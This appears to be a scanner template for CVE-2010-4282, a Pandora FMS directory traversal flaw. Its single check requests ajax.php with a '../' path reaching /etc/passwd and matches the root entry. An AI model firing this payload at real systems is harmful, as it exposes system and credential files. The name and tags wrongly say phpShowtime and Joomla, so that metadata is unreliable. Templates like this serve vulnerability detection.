id: CVE-2010-4282 info: name: phpShowtime 2.0 - Directory Traversal author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php. impact: | An attacker can exploit this vulnerability to access sensitive files containing confidential information, such as configuration files or user credentials. remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15643 - https://nvd.nist.gov/vuln/detail/CVE-2010-4282 - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download - http://www.exploit-db.com/exploits/15643 - http://seclists.org/fulldisclosure/2010/Nov/326 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-4282 cwe-id: CWE-22 epss-score: 0.01214 epss-percentile: 0.83767 cpe: cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: artica product: pandora_fms shodan-query: http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica http: - method: GET path: - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 490a0046304402201b4cbfaddf215e4507727c41a0a0b2a5fe584d66891aa082d5d3e1c647a7bb3402202499125b034828944ede2fdfc1673a00684dbc3abdb877a5ef2baa1824041954:922c64590222798bb761d5b6d8e72950